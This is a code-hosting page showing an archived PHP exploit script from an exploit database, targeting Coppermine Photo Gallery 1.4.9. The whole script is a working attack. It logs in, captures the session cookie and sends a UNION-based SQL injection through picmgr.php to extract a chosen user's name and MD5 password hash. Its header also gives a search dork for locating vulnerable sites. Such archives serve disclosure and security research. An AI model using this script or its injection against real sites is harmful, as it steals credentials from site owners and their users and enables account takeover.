PageRenderTime 50ms CodeModel.GetById 25ms RepoModel.GetById 1ms app.codeStats 0ms

/exploits/php/webapps/2660.php

https://bitbucket.org/DinoRex99/exploit-database
PHP | 103 lines | 68 code | 11 blank | 24 comment | 5 complexity | 008f2296e215c201da98520eee998d33 MD5 | raw file
Possible License(s): GPL-2.0 
    

  1. #!/usr/bin/php

    2. 

  2. <?php

    3. 

  3. 

    4. 

  4.  /*********************************************************************

    5. 

  5.  * Coppermine Photo Gallery 1.4.9 Remote SQL Injection Vulnerability 

    6. 

  6.  * 

    7. 

  7.  * Note:

    8. 

  8.  * Requires a valid user account.

    9. 

  9.  *

    10. 

  10.  * Usage: 

    11. 

  11.  * php script.php [host] [path] [table prefix] [user id] [username] [password]

    12. 

  12.  *

    13. 

  13.  * Usage Example:

    14. 

  14.  * php script.php domain.com /coppermine/ cpg149_ 1 john secret

    15. 

  15.  *

    16. 

  16.  * Googledork"

    17. 

  17.  * "Powered by Coppermine Photo Gallery"

    18. 

  18.  *

    19. 

  19.  * Credits:

    20. 

  20.  * Disfigure - Vulnerability research and discovery

    21. 

  21.  * Synsta - Exploit scripting

    22. 

  22.  * 

    23. 

  23.  * [w4ck1ng] - w4ck1ng.com

    24. 

  24.  *********************************************************************/

    25. 

  25. 

    26. 

  26. if(!$argv[6]){

    27. 

  27. die("Usage:

    28. 

  28. php $argv[0] [host] [path] [table prefix] [user id] [username] [password]\n

    29. 

  29. Usage Example:

    30. 

  30. php $argv[0] domain.com /coppermine/ cpg149_ 1 john secret\n");

    31. 

  31. }

    32. 

  32. 

    33. 

  33. if($argv[6]){

    34. 

  34. 

    35. 

  35. function send($host,$put){

    36. 

  36. global $data;

    37. 

  37. $conn = fsockopen(gethostbyname($host),"80");

    38. 

  38. if(!$conn) {

    39. 

  39. die("Connection to $host failed...");

    40. 

  40. }else{

    41. 

  41. fputs($conn,$put);

    42. 

  42. }

    43. 

  43. while(!feof($conn)) {

    44. 

  44. $data .=fgets($conn);

    45. 

  45. }

    46. 

  46. fclose($conn);

    47. 

  47. return $data;

    48. 

  48. }

    49. 

  49. 

    50. 

  50. $host = $argv[1];

    51. 

  51. $path = $argv[2];

    52. 

  52. $prefix = $argv[3];

    53. 

  53. $userid = $argv[4];

    54. 

  54. $userl = $argv[5];

    55. 

  55. $passl = $argv[6];

    56. 

  56. 

    57. 

  57. $post = "username=".urlencode($userl)."&password=".urlencode($passl)."&submitted=Login";

    58. 

  58. $req  = "POST ".$path."login.php?referer=index.php HTTP/1.1\r\n"; 

    59. 

  59. $req .= "Referer: http://".$host.$path."login.php?referer=index.php\r\n";

    60. 

  60. $req .= "Host: $host\r\n";

    61. 

  61. $req .= "Content-Type: application/x-www-form-urlencoded\r\n";

    62. 

  62. $req .= "Content-Length: ".strlen($post)."\r\n";

    63. 

  63. $req .= "Connection: Close\r\n";

    64. 

  64. $req .= "Cache-Control: no-cache\r\n\r\n";

    65. 

  65. $req .= $post;

    66. 

  66. send("$host","$req");

    67. 

  67. 

    68. 

  68. /* Borrowed from rgod. */           

    69. 

  69. $temp = explode("Set-Cookie: ",$data);

    70. 

  70. $temp2 = explode(" ",$temp[1]);

    71. 

  71. $cookie = $temp2[0];

    72. 

  72. $temp2 = explode(" ",$temp[2]);

    73. 

  73. $cookie .= " ".str_replace(";","",$temp2[0]);

    74. 

  74. $cookie = str_replace("\r","",$cookie);

    75. 

  75. $cookie = str_replace("\n","",$cookie);

    76. 

  76.             

    77. 

  77. $sql = urlencode("123 UNION SELECT user_id,user_group,concat(user_name,char(58,58),user_password) FROM ".$prefix."users where user_id = ".$userid." --");

    78. 

  78. $req =  "GET ".$path."picmgr.php?aid="."$sql HTTP/1.1\r\n";

    79. 

  79. $req .= "Host: $host\r\n";

    80. 

  80. $req .= "Content-Type: application/x-www-form-urlencoded\r\n";

    81. 

  81. $req .= "Cookie: ".$cookie."\r\n\r\n";

    82. 

  82. $req .= "Connection: Close\r\n\r\n";

    83. 

  83. send("$host","$req");

    84. 

  84. 

    85. 

  85. $gdata = explode("<option value=\"picture_no=1,picture_nm=",$data);

    86. 

  86. $ghash = explode(",action=0\">",$gdata[1]);

    87. 

  87. $hash = $ghash[0];

    88. 

  88. $uname = explode("'",$hash);

    89. 

  89. $uname = explode("::",$uname[1]);

    90. 

  90. $username = $uname[0];

    91. 

  91. $fhash = explode("::",$hash);

    92. 

  92. $fhash = explode("',picture_sort=100",$fhash[1]);

    93. 

  93. $finalhash = $fhash[0];

    94. 

  94. 

    95. 

  95. if(strlen($finalhash) != 32){ 

    96. 

  96. die("Exploit failed..\n"); 

    97. 

  97. }else{ 

    98. 

  98. die("Username: $username MD5: $finalhash\n"); 

    99. 

  99. }

    100. 

  100. }

    101. 

  101. ?>

    102. 

  102. 

    103. 

  103. # milw0rm.com [2006-10-27]
    104.